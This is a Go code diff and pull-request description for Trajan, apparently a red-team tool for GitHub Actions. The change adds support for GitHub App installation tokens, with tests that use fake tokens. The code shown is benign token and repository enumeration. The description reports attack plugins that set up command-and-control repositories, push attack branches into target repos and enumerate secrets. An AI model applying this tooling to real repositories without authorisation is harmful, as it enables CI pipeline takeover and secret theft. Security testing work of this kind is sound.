+		t.Fatalf("Init() error = %v", err)
+	}
+	result, err := p.EnumerateRepos(context.Background(), platforms.Target{Type: platforms.TargetUser, Value: ""})
+	if err != nil {
+		t.Fatalf("EnumerateRepos() error = %v", err)
+	}
+	if len(result.Repositories) != 1 || result.Repositories[0].Name != "a" {
+		t.Errorf("Repositories = %+v, want [a]", result.Repositories)
+	}
+}

--- a/pkg/github/enumerate_types.go
+++ b/pkg/github/enumerate_types.go
@@ -8,11 +8,13 @@ import (
 
 // TokenEnumerateResult contains token validation and enumeration results
 type TokenEnumerateResult struct {
-	TokenInfo     *TokenInfo         `json:"token_info,omitempty"`
-	Permissions   map[string]string  `json:"permissions,omitempty"`   // Fine-grained permissions
-	Organizations []OrganizationInfo `json:"organizations,omitempty"` // Accessible organizations
-	RateLimit     *RateLimitInfo     `json:"rate_limit,omitempty"`
-	Errors        []error            `json:"-"`
+	TokenInfo           *TokenInfo         `json:"token_info,omitempty"`
+	Permissions         map[string]string  `json:"permissions,omitempty"`   // Fine-grained permissions
+	Organizations       []OrganizationInfo `json:"organizations,omitempty"` // Accessible organizations
+	RateLimit           *RateLimitInfo     `json:"rate_limit,omitempty"`
+	AccessibleRepos     int                `json:"accessible_repos,omitempty"`
+	RepositorySelection string             `json:"repository_selection,omitempty"`
+	Errors              []error            `json:"-"`
 }
 
 // OrganizationInfo contains organization membership information

--- a/pkg/github/github.go
+++ b/pkg/github/github.go
@@ -101,10 +101,20 @@ func (p *Platform) Scan(ctx context.Context, target platforms.Target) (*platform
 		fmt.Fprintf(os.Stderr, "Found %d repositories\n", len(repos))
 
 	case platforms.TargetUser:
-		fmt.Fprintf(os.Stderr, "Enumerating repositories for user %s...\n", target.Value)
-		repos, err = p.client.ListUserRepos(ctx, target.Value)
-		if err != nil {
-			return nil, fmt.Errorf("listing user repos: %w", err)
+		if target.Value == "" {
+			// Empty user = all accessible repos (app token => installation repos;
+			// user token => owned + org + collaborator repos).
+			fmt.Fprintf(os.Stderr, "Enumerating all accessible repositories...\n")
+			repos, err = p.enumerateAllAccessibleRepos(ctx)
+			if err != nil {
+				return nil, fmt.Errorf("enumerating accessible repos: %w", err)
+			}
+		} else {
+			fmt.Fprintf(os.Stderr, "Enumerating repositories for user %s...\n", target.Value)
+			repos, err = p.client.ListUserRepos(ctx, target.Value)
+			if err != nil {
+				return nil, fmt.Errorf("listing user repos: %w", err)
+			}
 		}
 		fmt.Fprintf(os.Stderr, "Found %d repositories\n", len(repos))
 

--- a/pkg/github/github_test.go
+++ b/pkg/github/github_test.go
@@ -4,15 +4,17 @@ package github
 import (
 	"context"
 	"encoding/base64"
+	"fmt"
 	"net/http"
 	"net/http/httptest"
 	"strings"
 	"testing"
 
-	"github.com/praetorian-inc/trajan/internal/registry"
-	"github.com/praetorian-inc/trajan/pkg/platforms"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
+
+	"github.com/praetorian-inc/trajan/internal/registry"
+	"github.com/praetorian-inc/trajan/pkg/platforms"
 )
 
 func TestGitHubPlatform_Name(t *testing.T) {
@@ -394,5 +396,34 @@ func TestPlatform_ScanTokenInfo(t *testing.T) {
 	}
 	if result.TokenInfo.User != "testuser" {
 		t.Errorf("ScanTokenInfo().TokenInfo.User = %q, want %q", result.TokenInfo.User, "testuser")
+	}
+}
+
+func TestPlatform_Scan_GitHubAppAllAccessible(t *testing.T) {
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/json")
+		switch r.URL.Path {
+		case "/installation/repositories":
+			w.WriteHeader(http.StatusOK)
+			fmt.Fprint(w, `{"total_count":1,"repository_selection":"all","repositories":[
+				{"name":"a","full_name":"acme/a","owner":{"login":"acme","type":"Organization"}}]}`)
+		case "/repos/acme/a/contents/.github/workflows":
+			w.WriteHeader(http.StatusNotFound) // no workflows
+		default:
+			w.WriteHeader(http.StatusNotFound)
+		}
+	}))
+	defer server.Close()
+
+	p := NewPlatform()
+	if err := p.Init(context.Background(), platforms.Config{BaseURL: server.URL, Token: "ghs_test"}); err != nil {
+		t.Fatalf("Init() error = %v", err)
+	}
+	result, err := p.Scan(context.Background(), platforms.Target{Type: platforms.TargetUser, Value: ""})
+	if err != nil {
+		t.Fatalf("Scan() error = %v", err)
+	}
+	if len(result.Repositories) != 1 || result.Repositories[0].Name != "a" {
+		t.Errorf("Repositories = %+v, want [a]", result.Repositories)
 	}
 }

--- a/pkg/github/installation.go
+++ b/pkg/github/installation.go
@@ -1,0 +1,48 @@
+package github
+
+import (
+	"context"
+	"fmt"
+)
+
+// InstallationReposResponse wraps GET /installation/repositories.
+// repository_selection is "all" or "selected".
+type InstallationReposResponse struct {
+	TotalCount          int          `json:"total_count"`
+	RepositorySelection string       `json:"repository_selection"`
+	Repositories        []Repository `json:"repositories"`
+}
+
+// IsGitHubAppToken reports whether this client's token is a GitHub App installation token.
+func (c *Client) IsGitHubAppToken() bool {
+	return IsAppToken(c.token)
+}
+
+// ListInstallationRepos lists repositories accessible to the app installation.
+// Works with a bare ghs_ installation token (needs only Metadata: read).
+// Pagination terminates on total_count (robust against exact-multiple page sizes).
+// Returns the repositories and the repository_selection ("all"|"selected").
+func (c *Client) ListInstallationRepos(ctx context.Context) ([]Repository, string, error) {
+	var all []Repository
+	selection := ""
+	page := 1
+	perPage := 100
+
+	for {
+		var resp InstallationReposResponse
+		path := fmt.Sprintf("/installation/repositories?per_page=%d&page=%d", perPage, page)
+		if err := c.get(ctx, path, &resp); err != nil {
+			return nil, "", fmt.Errorf("listing installation repos: %w", err)
+		}
+		selection = resp.RepositorySelection
+		all = append(all, resp.Repositories...)
+
+		// Stop when we have them all, or the page returned nothing.
+		if len(resp.Repositories) == 0 || len(all) >= resp.TotalCount {
+			break
+		}
+		page++
+	}
+
+	return all, selection, nil
+}

--- a/pkg/github/installation_test.go
+++ b/pkg/github/installation_test.go
@@ -1,0 +1,52 @@
+package github
+
+import (
+	"context"
+	"fmt"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+)
+
+func TestClient_ListInstallationRepos_Pagination(t *testing.T) {
+	// total_count=3, per_page=2 => two pages; terminate on total_count.
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.URL.Path != "/installation/repositories" {
+			t.Errorf("unexpected path: %s", r.URL.Path)
+		}
+		page := r.URL.Query().Get("page")
+		w.Header().Set("Content-Type", "application/json")
+		w.WriteHeader(http.StatusOK)
+		switch page {
+		case "1":
+			fmt.Fprint(w, `{"total_count":3,"repository_selection":"selected","repositories":[
+				{"name":"a","owner":{"login":"acme","type":"Organization"}},
+				{"name":"b","owner":{"login":"acme","type":"Organization"}}]}`)
+		default:
+			fmt.Fprint(w, `{"total_count":3,"repository_selection":"selected","repositories":[
+				{"name":"c","owner":{"login":"acme","type":"Organization"}}]}`)
+		}
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "ghs_test")
+	repos, selection, err := client.ListInstallationRepos(context.Background())
+	if err != nil {
+		t.Fatalf("ListInstallationRepos() error = %v", err)
+	}
+	if len(repos) != 3 {
+		t.Errorf("got %d repos, want 3", len(repos))
+	}
+	if selection != "selected" {
+		t.Errorf("selection = %q, want selected", selection)
+	}
+}
+
+func TestClient_IsGitHubAppToken(t *testing.T) {
+	if !NewClient("", "ghs_x").IsGitHubAppToken() {
+		t.Error("ghs_ token should be app token")
+	}
+	if NewClient("", "ghp_x").IsGitHubAppToken() {
+		t.Error("ghp_ token should not be app token")
+	}
+}

--- a/pkg/github/tokeninfo.go
+++ b/pkg/github/tokeninfo.go
@@ -17,7 +17,16 @@ const (
 	TokenTypeClassic     TokenType = "classic"
 	TokenTypeFineGrained TokenType = "fine_grained"
 	TokenTypeUnknown     TokenType = "unknown"
+	TokenTypeGitHubApp   TokenType = "github_app"
 )
+
+// IsAppToken reports whether the token is a GitHub App installation access token.
+// Detection is prefix-only ("ghs_") so it accepts both the legacy opaque form and the
+// newer stateless-JWT form. Other prefixes (ghu_, gho_, ghp_, github_pat_) are NOT
+// installation tokens and must keep the user-backed (/user) validation path.
+func IsAppToken(token string) bool {
+	return strings.HasPrefix(token, "ghs_")
+}
 
 // TokenInfo contains metadata about the authenticated GitHub token
 type TokenInfo struct {
@@ -93,6 +102,9 @@ func detectTokenType(scopes []string, hasExpiration bool, token string) TokenTyp
 	}
 
 	// Priority 2: Token prefix detection (CORS/WASM fallback)
+	if IsAppToken(token) {
+		return TokenTypeGitHubApp
+	}
 	if strings.HasPrefix(token, "ghp_") {
 		return TokenTypeClassic
 	}
@@ -105,6 +117,15 @@ func detectTokenType(scopes []string, hasExpiration bool, token string) TokenTyp
 
 // GetTokenInfo retrieves metadata about the authenticated token
 func (c *Client) GetTokenInfo(ctx context.Context) (*TokenInfo, error) {
+	// GitHub App installation tokens authenticate as the app, not a user.
+	// /user returns 403; validate via the installation-scoped endpoint instead.
+	if c.IsGitHubAppToken() {
+		if _, _, err := c.ListInstallationRepos(ctx); err != nil {
+			return nil, fmt.Errorf("validating installation token: %w", err)
+		}
+		return &TokenInfo{Type: TokenTypeGitHubApp}, nil
+	}
+
 	resp, err := c.do(ctx, http.MethodGet, "/user", nil)
 	if err != nil {
 		return nil, fmt.Errorf("getting token info: %w", err)

--- a/pkg/github/tokeninfo_test.go
+++ b/pkg/github/tokeninfo_test.go
@@ -2,6 +2,7 @@ package github
 
 import (
 	"context"
+	"fmt"
 	"net/http"
 	"net/http/httptest"
 	"testing"
@@ -228,5 +229,64 @@ func TestClient_GetTokenInfo(t *testing.T) {
 				t.Errorf("GetTokenInfo().Scopes len = %d, want %d", len(info.Scopes), tt.wantScopeCount)
 			}
 		})
+	}
+}
+
+func TestIsAppToken(t *testing.T) {
+	tests := []struct {
+		name  string
+		token string
+		want  bool
+	}{
+		{"installation opaque", "ghs_AbCdEf0123456789", true},
+		{"installation jwt-shaped", "ghs_eyJhbG.payload.sig", true},
+		{"classic PAT", "ghp_AbCdEf0123456789", false},
+		{"fine-grained PAT", "github_pat_11ABC", false},
+		{"user-to-server", "ghu_AbCdEf0123456789", false},
+		{"oauth", "gho_AbCdEf0123456789", false},
+		{"empty", "", false},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := IsAppToken(tt.token); got != tt.want {
+				t.Errorf("IsAppToken(%q) = %v, want %v", tt.token, got, tt.want)
+			}
+		})
+	}
+}
+
+func TestDetectTokenType_GitHubApp(t *testing.T) {
+	// No scopes, no expiration, ghs_ prefix => github_app
+	if got := detectTokenType(nil, false, "ghs_AbCdEf0123456789"); got != TokenTypeGitHubApp {
+		t.Errorf("detectTokenType(ghs_) = %q, want %q", got, TokenTypeGitHubApp)
+	}
+	// ghu_ must NOT be classified as app
+	if got := detectTokenType(nil, false, "ghu_AbCdEf0123456789"); got == TokenTypeGitHubApp {
+		t.Errorf("detectTokenType(ghu_) = %q, must not be github_app", got)
+	}
+}
+
+func TestClient_GetTokenInfo_GitHubApp(t *testing.T) {
+	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		// App tokens must validate via /installation/repositories, NOT /user.
+		if r.URL.Path != "/installation/repositories" {
+			t.Errorf("app token hit %s, want /installation/repositories", r.URL.Path)
+		}
+		w.Header().Set("Content-Type", "application/json")
+		w.WriteHeader(http.StatusOK)
+		fmt.Fprint(w, `{"total_count":0,"repository_selection":"selected","repositories":[]}`)
+	}))
+	defer server.Close()
+
+	client := NewClient(server.URL, "ghs_test")
+	info, err := client.GetTokenInfo(context.Background())
+	if err != nil {
+		t.Fatalf("GetTokenInfo() error = %v", err)
+	}
+	if info.Type != TokenTypeGitHubApp {
+		t.Errorf("Type = %q, want %q", info.Type, TokenTypeGitHubApp)
+	}
+	if info.User != "" {
+		t.Errorf("User = %q, want empty for app token", info.User)
 	}
 }


### PR DESCRIPTION
## Summary

Adds first-class support for **GitHub App installation tokens** (`ghs_` prefix) across all three Trajan GitHub commands — `enumerate`, `scan`, and `attack`. Previously these tokens failed immediately because the client validated and resolved identity through user-backed endpoints (`/user`, `/user/orgs`, `/user/repos`), which return `403 Resource not accessible by integration` for a token that authenticates as an app installation rather than a user.

Resolves **LAB-3928**.

## Problem

GitHub's `/user*` endpoints serve double duty in the client: **token validation** and **identity resolution**. An installation token has no user identity, so every one of those calls 403s. The failure surfaced in `GetTokenInfo()` (validation) and propagated through `enumerate` and `scan`; two `attack` plugins additionally assumed a personal namespace that an installation simply does not have.

## Solution

The client is now **token-type aware**. For `ghs_` tokens it validates and self-enumerates via the installation-scoped endpoint `GET /installation/repositories`, and derives scope from the installation account rather than a user.

| Area | Change |
|------|--------|
| **Client** | `TokenTypeGitHubApp` + prefix-based `IsAppToken` (accepts opaque and JWT `ghs_` forms); `GetTokenInfo` validates app tokens via `/installation/repositories`; new `ListInstallationRepos` (total-count pagination) and `Client.IsGitHubAppToken`. |
| **`enumerate`** | `token` reports the installation account, `repository_selection`, and accessible-repo count (an org is listed only when `owner.type == "Organization"`); `repos` lists installation repositories (incl. those with no reported permission bits); `secrets` works unchanged via repo/org-scoped endpoints. |
| **`scan`** | App tokens with no `--repo/--org/--user` default to scanning **all** installation repositories; user-backed tokens still require an explicit target. |
| **`attack`** | `c2-setup` requires `--c2-org` and creates C2 via `POST /orgs/{org}/repos` (new `CreateOrgRepository`), failing fast when unavailable. `runner-on-runner` pushes the attack branch **directly into the write-accessible target** (installation tokens cannot fork into a user namespace) and requires an explicit `--c2-repo`. The other 7 plugins are unchanged. |

### Design notes
An installation lives on exactly **one account** (which may be a personal user, not an org), installation tokens are **1-hour and non-refreshable** (Trajan holds no app JWT), and the repo `permissions` object is unreliable for installation tokens — the design accounts for all three. User-backed token flows (`ghp_`, `github_pat_`, `ghu_`) are deliberately left on the existing `/user` path and are verified unaffected.

## Testing

**Unit:** table-driven `httptest` coverage for token detection (incl. negative cases for `ghu_`/`gho_`/`ghp_`/`github_pat_`), installation-repo pagination, app-token validation, enumerate/scan branches, and the two attack fail-fast paths. Full `make test` (race) passes with zero failures; user-token regression cases confirmed unaffected.

**Live validation** against a real minted `ghs_` installation token:
- `enumerate token` → identifies "GitHub App installation token", selection `all`, accessible repos + owning org
- `enumerate repos` → lists installation repositories
- `enumerate secrets --repo` → enumerates repo Actions/workflow secrets
- `scan` (no target) → discovers installation repos, analyzes workflows, produces findings

Completes LAB-3928

🤖 Generated with [Claude Code](https://claude.com/claude-code)
